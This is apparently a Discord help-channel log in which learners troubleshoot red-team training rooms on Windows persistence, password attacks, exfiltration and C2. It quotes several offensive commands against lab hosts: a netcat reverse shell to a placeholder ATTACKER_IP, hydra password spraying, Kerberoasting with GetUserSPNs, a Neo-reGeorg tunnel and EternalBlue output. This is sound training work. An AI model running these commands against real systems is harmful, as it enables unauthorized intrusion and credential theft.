Also, flag13.exe is not working. I got the reverse shell but I am able to get the flag12 instead of flag13

calm gyro
#

For the last flag I got this error, do you have any idea?

gilded edge
# calm gyro Hello, I can see that a lot of commands are done with psexec in the Windows Loca...
  1. I didn't clearly get the first message. Do you wanna say that some commands are specific to psexec only right? So how can you do the same exact work without psexec?

  2. Same problem happened with me because if you tried the same payload exe for getting flag13 then flag12 payload will connect before the payload for getting flag13 so try to change the port no or remove the payload exe entry in userinit so that only payload for flag13 will connect back to you!

  3. This is non interactive shell. It is clearly saying you have connected with the victim just type the command. You will get the command output.

gilded edge
# gilded edge 1. I didn't clearly get the first message. Do you wanna say that some commands a...

According to windows local persistence room

There is only one major use of psexec to simple get SYSTEM account access to edit registries!

There is also alternative ways to done this task. Sometimes in real world you can get the reverse shell with the SYSTEM account after exploiting some type of vulnerabilities or you can also migrate to SYSTEM account process. After that simply use reg command to done the same task on terminal rather than on GUI

calm gyro
calm gyro
thin irisBOT
#

Gave +1 Rep to @gilded edge

gilded edge
calm gyro
gilded edge
#

You can tag me anytime, if you have any question!

calm gyro
# gilded edge You can tag me anytime, if you have any question!

So will be also a way, if I am Admim, to install this tool in order to access the registry with high privileges faster. But then I have to be careful to remove this tool and the logs that I made with it. In a red team scrnario will be complicated, but for a regular pentest should be good I think

gilded edge
# calm gyro So will be also a way, if I am Admim, to install this tool in order to access th...

Yup, But majority of the time. You can find these sysinternal tools on the system in larger environment
these tools helps sysadmin to manage many things
one of the tool is sysmon tool https://tryhackme.com/room/sysmon to monitor and log events of windows system

You don't need to install it. You can simply transfer portable exe to the victim in order to use it.

#

one of the website for sysinternals is a phishing page so don't go there

#

they simply replace l with i

calm gyro
gilded edge
#

⚠️ This is phishing website so be careful before downloading from a google search!
Means there tools might be malicious

calm gyro
thin irisBOT
#

Gave +1 Rep to @gilded edge

calm gyro
calm gyro
#

I tried also the 3rd problem and the flag is not working:

calm gyro
calm gyro
gilded edge
calm gyro
#

Yes the shell is working

gilded edge
#

Wait

#

You are on powershell

#

Try ./flag17

#

.exe

calm gyro
#

Yes, is working now 🎉

gilded edge
#

Ok good

calm gyro
prime knot
#

seriously

#

someone deletet Flag.exe from toby.beck?

gilded edge
# calm gyro

Everything looks Ok

Check is revshell.exe is on that path

Second check listening port and payload set port

Third thing HKCU change only apply to the current user
Try HKLM environment change

#

And remember after signing out and again login you will get the shell after few seconds not fast as the previous flag12 registry

calm gyro
#

I think that this is not aplicable in HKLM and I have to set it for all users in HKCU

#

I got it now. The problem was that I was opening the regedit from psexec instead of opening from the start menu. So, I think I edited the variable for a system user

#

Thanks again!

static scroll
#

I need help in task 2 signature evasion pls

prime knot
#

sth wrong with this neo-reGeorg?

prime knot
#

wtf is wrong with this netplan in attackerbox?!

prime knot
#

Where is procexp on Windows Internals

#

?

minor garnet
untold fjord
#

in Weaponization, did anyone have trouble with the user emulation app? It looks like port 8080 isn't open

untold fjord
robust skiff
#

or just automate the splitting process and round the result bytes
using tool described in the next task

prime knot
#

Hello I cannot run dll-injector.exe

#

task Abusing Windows Internals, 5

obsidian sundial
#

I'm in the Passwords Attacks section , task number 8. And i need to create some custom JTR rules. I have edited the /etc/john/john.conf , but it tells me i do not have any custom rules

obsidian sundial
#

own VM. Im trying to upload a screenshot 🙂

royal void
#

!docs verify

wind boneBOT
royal void
#

@obsidian sundial ⬆️ follow the instructions in this link to verify to be able to post screenshots

obsidian sundial
#

OK , ill try like this

#

john --wordlist=clinic.lst --rules=THMPW --stdout
Using default input encoding: UTF-8
No "THMPW" mode rules found in /etc/john/john.conf

#

so this is the error on my own VM

#

and this is my john.conf

#

tail -f 10 /etc/john/john.conf
tail: cannot open '10' for reading: No such file or directory
==> /etc/john/john.conf <==

include john-local.conf in local dir, it can override john.conf, john-local.conf (or any other conf file loaded)

This is disabled by default since it's a security risk in case JtR is ever run with untrusted current directory

#.include './john-local.conf'

End of john.conf file.

Keep this comment, and blank line above it, to make sure a john-local.conf

that does not end with \n is properly loaded.

[List.Rules:THMPW]
[!@]Az"[0-9][0-9]"

native berry
tropic ginkgo
#

I tried ( elcocohtb is my other account ) indeed , but that does not give any other effect

#

for sure i made a mistake somewhere , but i dont seem to find where

unkempt hemlock
#

Stuck on Task 9 of Room Password Attacks.

Here's the steps I've followed:

  1. Used the given usernames in the example usernames-list.txt.

  2. Generated a pass1.lst with "Spring Summer Fall Winter". Expanded it using the rule THM-Pass Az"[2][0][2][0-3]" ^[!@] based on the question hint. Command used was: john --wordlist=pass1.lst --rules=THM-Pass --stdout > pass2.lst.

  3. Attempted password spraying attack using: hydra -L usernames-list.txt -P pass2.lst ssh://10.10.147.70 -t 4. And following is the output:

#

What am I doing wrong? Should I change the rule somehow to get a hit?

#

Never mind, found the issue. The rule should of been Az"[2][0][2][0-3]" $[!@] which appends the special character at the end instead of at the beginning. Got the password. :)

minor garnet
minor garnet
calm gyro
#

Hello, I am doing Data Exfiltration room and at ICMP part I do not get any messages through nping. These are my options:

minor garnet
#

void the metasploit brother good framwork for pentisting but its ok

faint rampart
#

Intro to C2 Task 5, not sure aboute how to portforward. the 192.x.x.x should be replaced by what IP? I'm using the attack box.

wary raven
#

Hi! I have a conceptual doubt about the difference between the LDAP autentication and the NetNTLM autentication, especifically with the fact that the user actually logs in the DC with LDAP and it doesn't with NetNTLM, instead, is the aplication who logs for him.

My doubt is: if the user don't get log into the DC with NetNTLM where he gets log and what is exactly the meaning of "the application logs on his behalf" the application have various credentials for each user or something of the kind? Thanks!

faint rampart
#

Is there any bug on that Task OSPEC Task 7? I tried all possile combination

royal void
#

so if you tried all of the ones for the first one you probably on the second one now

faint rampart
royal void
#

oh wait no shadow sees your error

#

you must have spaces between all the numbers for some reasons

#

yes the spaces are mandatory

faint rampart
royal void
#

will wait a bit.... you send shadow a direct message if you need help instead of doing it yourself

echo ore
# wary raven Hi! I have a conceptual doubt about the difference between the LDAP autenticatio...

Hey, not sure I follow all of your question, but if you are talking about logging to the LDAP service of an Active Directory Server, LDAP uses SASL for authentication, which is simply a middle layer that ends up connecting to the actual authentication providers. In the end, SASL will usually have kerberos and NTLM as auth providers, which means that when you log into LDAP, you are probably using kerberos (or NTLM ) anyway

faint rampart
thin irisBOT
#

Gave +1 Rep to @royal void

royal void
unkempt hemlock
#

Room: Windows Local Persistence
Task: 2
Issue: Following the instructions in task 2, I used evil-winrm to download sam.bak and system.bak to my local machine. However they don't show up anywhere (especially not in the mentioned location). Anyone know what's going on?

#

I even tried specifying a file path after, but still the same.

native berry
calm gyro
#

In data exfiltration room we exfiltrate data through DNS protocol and THM provide us a web interface to make this step easy. I am curious how are these made in real life?

thin irisBOT
#

Gave +1 Rep to @echo ore

strange trench
#

Hey can someone explain why in red team engagement Task 7 we have

#

and the answer to the question "When will the engagement end? (MM/DD/YYYY)" is actually 14/11/2021 ??

#

is engagement dates the day both parts approved it ?

calm gyro
#

Try to refresh the page

#

And you have to look at Execution Dates

#

There you will find the last date

strange trench
#

After refreshing i still have same dates

strange trench
#

but what does this line means so ?

calm gyro
#

Post exploitation are the steps after the exploit has been done

#

Like cleaning the footprints, making backdoors. So as you can see that one is the last date registered

strange trench
#

mh ok it is just a step in the whole process

unkempt hemlock
thin irisBOT
#

Gave +1 Rep to @native berry

simple carbon
#

hello

#

which tool can i use to get hidden secrets from clear text

calm gyro
random lintel
#

I'm on Task 6 in the Data Exfiltration room. I'm trying to run the "python3 neoreg.py -k thm -u http://10.10.x.x/uploader/files/tunnel.php" command, but it gives me an error - "Georg is not ready, please check URL and KEY." I've confirmed the tunnel.php file has been uploaded. Not sure how to proceed.

#

I've even tried to use "-k admin" as the key, and that didn't work either.

#

Ah - I think I got it ... I had to also regenerate all of the template files using the correct key as well

static scroll
#

is Evading Logging and Monitoring bugged?

#

in the forum they everyone says task 10doesn't work

#

i've tried with the walkthrough but nothing

#

can anyone help me?

static scroll
#

Yeah everyone is having issues with task 10

wild robin
#

Having trouble with the last flag of local windows persistence, the MSSQL one, the web application simply does nothing when clicking the button, so no data is inserted and the trigger isn't called. Has this happened to anyone?

wild robin
forest sequoia
#

hey everyone i am having trouble accesing the AV Shell code evasion module the win machine says password expired

#

anyone else having this issue?

native berry
forest sequoia
#

Oh okay thank you!!

remote bough
#

Hey good people im in room Signature Evasion Task 5 and it asks me to check the "shell.exe" file in cyberchef yet the machine dont have internat connection how am i supposed to upload the file to the site ?

#

How can i do that ? i tried connect to SMBbut it asks for ROOT password

frosty knoll
#

is there something wrong for this Win-Local-Persistence task6 last flag

#

it ain't returning any rev shell

remote bough
#

went through this room and all my notes everything is required SSH or NC which i do not have

#

Will do, thank you !

thin irisBOT
#

Gave +1 Rep to @weak ice

frosty knoll
native berry
frosty knoll
#

after i sign out and rdp it again, i never got the shell.Tried it like 4 times even on the attack box

native berry
#

You just sign out and back in iirc ?

frosty knoll
#

oh sorry here's what they say "After doing this, sign out of your current session and log in again". So i sign out but i didn't find to sign in again so i just rdp again

#

when i sign out, i lose my rdp session. So i have to RDP it again

native berry
#

Do you sign out like that ?

frosty knoll
#

ya i did

#

i even tried from web browser too and after signingOut, there's an option to reconnect but got the same probs

#

i did the same for the other 2 flags and they work

native berry
frosty knoll
#

ya...

native berry
frosty knoll
#

sure

native berry
#

So to the target machine, not your own 😄

#

Just to be clear

frosty knoll
#

k

native berry
frosty knoll
#

can i DM u?

native berry
#

Ye

remote bough
#

I feel like an idiot it didnt manage to transfer the file can i dm you for help ?

wind boneBOT
remote bough
#

I understand i just dont manage to get what to do i cant download any tool in that machine and half of the stuff i try to move there using linux server get deleted with Defender ver frustrating

remote bough
#

Thank you lassi i will try

thin irisBOT
#

Gave +1 Rep to @weak ice

remote bough
#

I DID IT !!!

bright swan
#

hey guys anyone having issues with adding the dns to breachingad box ?

#

i tried it on several Oses and can't ping the website requested or can't even ping the DC

brave sinew
bright swan
bright swan
#

Yes

high cipher
#

Hello ,
I keep getting an error when trying to exploit windows machine on Intro to C2
Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override

#

this is the config

#

im on kali browser machine

vast quest
#

Are you on the Attackbox or the Kali webbox?

high cipher
#

Kali

vast quest
#

That's outdated, you should use the attackbox instead.

high cipher
#

ok ,trying with attackbox

lean edge
#

In this which Domain will contain the forest DC (the DC with Enterprise Admins group)

#

What should be configured between two domains for a user in Domain A to access a resource in Domain B?
A one way trust between two domains "B trusts A" would work. But this is not the answer to complete the lab someone help me

opaque iron
#

Hey guys, I'm doing Windows Privilege Escalation module in this path and I see this ^

Any idea what LOCAL represents in this command and why it is necessary?

native berry
blazing sigil
native berry
blazing sigil
native berry
blazing sigil
#

I deleted the old shell (to obtain flag 12), and generated a new reverse shell with different ports, but did not revert the registry settings to obtain flag 12.

native berry
#

Might restarting the machine and redoing it fixes it

blazing sigil
#

@native berry turns out re-instantiating the VM worked. Thanks.

What I wonder is how the other registry settings could have affected getting flag 13, coz ideally they are supposed to be isolated, no?

thin irisBOT
#

Gave +1 Rep to @native berry

blazing sigil
#

or it could have been my mistake all along somehow? 🤔

native berry
blazing sigil
#

anyway, thanks again

forest sequoia
#

signature evasion task 2
To the nearest kibibyte, what is the first detected byte?
i splitted the shell.exe and got to the point whjere its not detecting anymore but the vlaue i put 50xxx is not the answer anyone can nudge on that???

#

whats a kibibyte exactly and whats the format

forest sequoia
#

NVM got it

opaque iron
#

Am I the only one to get this error? Can somebody help me fix this?

#

Tried commenting the line that has quoting_detection_proc() function, but that didn't work either

#

Tried this from the attackbox and it looks to work but there's an authorization issue.

#

Any help would be appreciated!

native berry
opaque iron
#

Oh sorry, forgot to mention

#

Room: Windows Local Persistence
Task: 2

native berry
#

Ah no sry, run net user thmuser1 pls

opaque iron
#

Sure

#

There you go

#

Okay, now the tool looks to function properly. Just re-ran the command and it worked.

#

But this works on attack-box and not in my machine

opaque iron
native berry
#

Screenshot of your openvpn output when connecting to the VPN as well as a screen of ip a ?

opaque iron
#

Sure, give me a min

native berry
# opaque iron

Can I try to connect to your target machine via that command myself ?

opaque iron
#

I am able to connect to the target from attack-box now

#

But looks like it's an evil-winrm issue

#

That's why I am unable to hit the target machine from my personal machine

native berry
opaque iron
#

You can check from your end, no issues

native berry
opaque iron
native berry
#

Not sure if it's from there, or from your openssl version or even from the vpn

opaque iron
#

I doubt the openssl version. I'm on 1.1

native berry
#

1.1 too

opaque iron
#

Oh

forest sequoia
#

Evading Logging and Monitoring task 10 the binary is stuck any help

high cipher
#

It's not loading

#

Yeah it turns out that I have to be on the vpn

faint rampart
#

Is there anything missing in my command as I'm waiting forever never hitting the right password hydra -l burgess -P clinic.lst 10.10.102.122 http-post-form "/login-post:username=^USER^&password=^PASS^:S=logout.php" -V -I -T 64 -f I modified the clinic.lst with the Single-Extra john rule. Password Attacks room Task 8

faint rampart
jolly trout
#

hey guys im doing breaching AD room iv got to the part of bruteforce ntlm with the python script ,but when i tried to brute force ntlm with hydra i couldnt figure out how to do it can anyone help me

wild robin
untold comet
#

having an issue with the weaponisation - Windows Scripting Host. Keep getting "cannot find script file error". Paths are correct (im in the same folder) and ive simplified the payload just a pop up incase it was an issue there. Also tried resetting attack box. Still getting it. Anyone had this before?

wild robin
untold comet
wild robin
#

Could be, I remember running into some sort of problem myself with that same step but I can't remember how I fixed it

lean edge
#

In the room https://tryhackme.com/room/winadbasics, there is question in trusts section

What should be configured between two domains for a user in Domain A to access a resource in Domain B?
I know that it should be B trusts A but the THM is not accepting answer. Please help someone

royal void
# lean edge In the room https://tryhackme.com/room/winadbasics, there is question in trusts...

Trust Relationships

Having multiple domains organised in trees and forest allows you to have a nice compartmentalised network in terms of management and resources. But at a certain point, a user at THM UK might need to access a shared file in one of MHT ASIA servers. For this to happen, domains arranged in trees and forests are joined together by trust relationships.
see title of this section and think a tiny bit more

lean edge
thin irisBOT
#

Gave +1 Rep to @royal void

royal void
#

no problem

round wraith
final chasm
#

when I using t2 user credential obtained from distributor.za.tryhackme.com/creds_t2. I accept the license with xfreerdp and then, it gives me the following error - 'license connection sequence aborted.' its Lateral Movement and Pivoting task 6. How to fix it?

brisk path
#

not sure what you experienced but that is a public domain

unkempt hemlock
unkempt hemlock
#

I have gotten agent.exe on my local machine and ran strings. Couldn't get the flag. Any idea what I should do next?

#

Ran ghidra on it, but I don't know it so can't make heads or tails of it. :')

unkempt hemlock
#

Got the flag! Converted the hex to text. :D

vast thorn
#

🙂

raven vortex
#

ok this gonna sound dumb but I'm doing the windows local persistence room, and I don't know how to get the flags from the .exe files, the room says to execute them. I'm connected via evil-winrm and Ive used these commands and nothing happens

left slate
#

do something like .\flag1.exe

#

or drop down to a cmd and do that or run a Invoke-Expression -Command "flag1.exe" “ in your PS

raven vortex
left slate
#

yup! 😄

#

no sweat

#

that should also work in cmd as well:)

raven vortex
#

the .\?

left slate
#

yup!

raven vortex
#

gotcha thanks I'll remember that

left slate
#

🙂 sounds good!

analog furnace
round wraith
unkempt hemlock
#

After that you need to be a bit creative, just looking for the flag in the code won't work. You need to do some encoding decoding.

round wraith
#

i already did that

#

how could i find that string to decode like in what function

unkempt hemlock
#

You should see the flag.

round wraith
#

can you just dm the flag plz

unkempt hemlock
round wraith
#

i laready done the task

tropic ginkgo
#

Hey guys, I'm currently going through the Red Teaming learning path and have hit a road block. In Red Team OPSEC, task 2, when I go to view site, there is no option to confirm or continue. I can only check off the boxes. At the bottom it notes: "(Please note that some browser extensions, such as NoScript, might prevent the site from loading correctly.)". I currently have no browser extensions and have tried performing the same task across several browsers. Any thoughts?

karmic junco
#

Hi everyone. I'm doing a red team room and exploring GHDB (Google Hacking DB). Is it normal for companies to have private RSA key exposed and if they are available what can be done with them? Maybe some kind of DNS poisoning or MITM attack? Just my guesses...

karmic junco
brave sinew
acoustic dock
#

hello iam finishing the nmap practice but i dont know who is the target machine for the scanning

toxic topaz
#

Hello I am on the lateral movement and pivoting room on the task3 and I not understand why we use the command runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443" . But at the end we are connected with the same user and not t1_leonard.summers (and I understood it's because the netonly argument) So my question is why we do this step ? Thanks

native berry
toxic topaz
#

@native berry Thanks

thin irisBOT
#

Gave +1 Rep to @native berry

tulip mauve
#

Hi! Please tell me!
Credentials Harvesting
Task 4 Local Windows Credentials
Why is it that when you try to copy a file, you are denied access?

Permission denied, please try again.
Although they write in tasks:
Now we have both required file, transfer them to the Attack Box with your favourite method (SCP should work).

frosty knoll
#

how do we check the last user logon in windows again instead of checking each and every user like this ```
net user john /domain | findstr /C:”Last logon”

round wraith
desert vault
#

really stumped at what should be a basic challenge in the Task 4 of the "Password Attacks" room... I even found a writeup online with the exact same answer I was trying, which makes me wonder if there isn't some sort of bug going on?? I'm referring to the crunch question. I'm pretty confident the answer is ||crunch 5 5 -t "THM^!" -o tryhackme.txt||

unkempt hemlock
tropic ginkgo
#

@karmic junco Ah, yes I get it now. Thank you!

thin irisBOT
#

Gave +1 Rep to @karmic junco

leaden bear
tulip mauve
#

Hello everyone
Who passed the room - Credentials Harvesting
I still can't figure out what prevents copying files in tasks 4 and 7
neither through linux or windows

brave sinew
#

Your password seems to be wrong. And you have spaces in your path

#

cannot stat Directory/ntds.dit indicates that it splits the path

tulip mauve
#

I don't think the problem is spaces and password..

#

and it's hard to make a mistake with a password)

ashen jacinth
#

Hi, does the Administrator:tryhackmewouldnotguess1@ working? I'm trying to start at Task 2.

unkempt hemlock
#

Try clicking on the info (small i icon) below the split view window for your AttackBox for your username and password.

unkempt hemlock
tulip mauve
#

Tried, yes, showing credentials specifically for me:

But it didn't help!
What am I doing wrong?

#

As I understand it, these are AttackBox credentials
and NOT windows machines.
I'm trying to copy files from the windows machine to my attacking machine.
I need credentials from windows.
And this, as I understand it:
the IP address of the machine: 10.10.34.180
User Name: thm
Password: Password!

tulip mauve
#

It's okay, I figured it out.
My head is completely confused...in all of this.
Thank you!)

#

That's who else would help to sort out this problem.
(maybe everything is also being solved banally)🤔
#persisting-ad message

opaque iron
#

Room: Windows Local Persistence
Task2: Tampering With Unprivileged Accounts
Section: Assign Group Memberships

I did everything as suggested in the room but when I execute the flag as admin it wouldn't give me the result. Why is that?

opaque iron
#

Could anybody help please?

ashen jacinth
#

Hello all, just wondering how did you install the DSinternals in persistence through SID history? via offline mode?

minor garnet
#

hi brothers

#

some are here

simple creek
#

hi, someone knows what can be the reason when using VPN the listening port is never working?

tropic ginkgo
#

Hello

#

What's up ?

ashen jacinth
tropic ginkgo
#

Yo
Is it still possible to get the red teamer tag?

#

Thx

toxic tusk
#

hi all. In the part Intro C2, the exploit eternal blue its not working. It fails for some reason

pastel valley
toxic tusk
#

I set up the exploit on metasploit. Setup remote hosts and local host. Meterpreter like a payload by default and explioit

The exploit trying three times and failed

#

+] 10.10.50.188:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 10.10.50.188:445 - Trying exploit with 12 Groom Allocations.
[
] 10.10.50.188:445 - Sending all but last fragment of exploit packet
[] 10.10.50.188:445 - Starting non-paged pool grooming
[+] 10.10.50.188:445 - Sending SMBv2 buffers
[+] 10.10.50.188:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[
] 10.10.50.188:445 - Sending final SMBv2 buffers.
[] 10.10.50.188:445 - Sending last fragment of exploit packet!
[
] 10.10.50.188:445 - Receiving response from exploit packet
[+] 10.10.50.188:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] 10.10.50.188:445 - Sending egg to corrupted connection.
[
] 10.10.50.188:445 - Triggering free of corrupted buffer.
[-] 10.10.50.188:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.50.188:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.50.188:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

pastel valley
#

try restarting the machine

#

ive gotten it to work after restarting it

toxic tusk
#

finally after one hour trying. I think this is because eternal blue usually harm the machine

vast quest
#

There is a channel specifically for Malware discussion, its not here.

Non offensive projects are good,

Probably best sticking to one language to start off with, you might end up confusing the two languages.

vast quest
sacred wedge
#

o h

#

okay that's fair

simple creek
#

hi, i am exploiting Blue, using my own attack machine connecte via vpn, i have set the LHOST to the tun0 ip from VPN, but its not working...
[] Started reverse TCP handler on VPN_IP:4444
[
] 10.10.135.77:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.135.77:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[] 10.10.135.77:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.135.77:445 - The target is vulnerable.
[
] 10.10.135.77:445 - Connecting to target for exploitation.
[+] 10.10.135.77:445 - Connection established for exploitation.
[+] 10.10.135.77:445 - Target OS selected valid for OS indicated by SMB reply
[] 10.10.135.77:445 - CORE raw buffer dump (42 bytes)
[
] 10.10.135.77:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[] 10.10.135.77:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[
] 10.10.135.77:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.135.77:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 10.10.135.77:445 - Trying exploit with 12 Groom Allocations.
[
] 10.10.135.77:445 - Sending all but last fragment of exploit packet
[-] 10.10.135.77:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
[*] Exploit completed, but no session was created.

#

can i have some help with this please?

#

there is some channel to ask for this type of problems related to machines?

native berry
#

You put in VPN_IP as your lhost instead of an actual IP

#

Unless you manually changed that before posting the error in here

simple creek
#

yes, i did

#

i just changed to another region vpn and its fixed now

steel crag
#

Shouldnt the machines in the red-team-path be reachable via RDP over the internet when the Info says so?

#

But all ports are filtered on the "Windows Internals" box when trying to reach. Only accessible via the split-view in Browser as it seems?

#

Ah okay makes sense. Had a long day trying to learn C++ ... that takes away your sanity after a while. Thanks for noting the obvious. 😄

thin irisBOT
#

Gave +1 Rep to @weak ice

blazing sigil
#

hello people. how does one find stack arguments in ProcMon?

#

I've tried searching everything on Google, but to no avail.

keen jungle
#

Does programming mandatory in red teaming ? If does which languages are useful to learn ?

#

I’m currently doing Jr penetration tester path and will do red teaming soon.

blazing sigil
rustic merlin
#

Hi, ideas please, using Kali as attack box. Credentials Harvesting room, last task, Kerberoasting, having trouble obtaining SPN account. I can execute the initial command: python /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.240.27 THM.red/thm -request-user svc-user **But the request for the SPN returns errors: ** python /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.240.27 THM.red/thm -request-user svc-thm
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

Password:
[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906B5, comment: AcceptSecurityContext error, data 52e, v4563

blazing sigil
rustic merlin
rustic merlin
#

tnx, it led to more errors python3.9 ~/Downloads/impacket0.9.19/impacket-0.9.19/examples/GetUserSPNs.py -dc-ip 10.10.240.27 THM.red/thm -request-user svc-thm
File "/home/kali/Downloads/impacket0.9.19/impacket-0.9.19/examples/GetUserSPNs.py", line 63
print outputFormat.format(*header)
^
SyntaxError: invalid syntax

blazing sigil
#

you might have to use python2 version of impacket

rustic merlin
#

tnx for the help, sounds like a lot of reconfiguring, I went back to using the attackbox for the last steps

blazing sigil
#

hehe alright.

rustic merlin
#

I like to know how to do it independent of the Attackbox, but apparently there is too much versioning built into this task, tnx again

blazing sigil
blazing sigil
# blazing sigil you could opt to use pyenv on your personal attack box and make a dedicated virt...
heady ingot
#

hi there, does anyone knows workaround to access the machine in weaponization room? the credentials provided in the details of the room is not working.

native berry
native berry
#

The creds you refer to are for the previous machine

heady ingot
#

Okay. There are two different machine.

#

Thanks for clarifying

opaque iron
echo ore
noble quail
#

Heya
I m doing the Lateral Movement Network. Got into the IIS machine but when the Flag.exe is ran , it displays: Sorry! You're still missing something, no flag for you yet (7)

#

my guess is that I didn't auth properly against the DC with /netonly

#

because that's the only thing I could've f'ed up without knowing about it. Having said this, I have no reason how to do that properly and yes I did complete the adenum network before this one

#

Could sb give me a nudge or something pretty please?

#

Also, say in case that nc64.exe wasn't available , can we just upload the bin ourselves? Like precompiled socat one for example? Having nc installed like that seems all too convenient

#

Oh and I decided to use a cmd reverse shell instead of meterpreter. I don't like relying on metasploit :D

noble quail
#

Moving this to lateralmovement network chat

tropic ginkgo
#

Hello! In the room Password attacks, task 3, I was surprised to learn that when you run 'sort combined_list.txt | uniq -u > cleaned_combined_list.txt' it deletes both duplicates, I expected it to keep one of them. Perhaps this should be mentioned in the task?

#

In this example "abc" is present twice in 3.txt and both removed in the sorted file 4.txt

dusk folio
#

Hi. Has anyone else had challenges building armitage in "Setting up a C2 Framework"? Following the steps, I have updated Gradle to 7.2 to work with the version of openJDK, but then:


FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':cortana:jar'.
I am using Kali 2022.4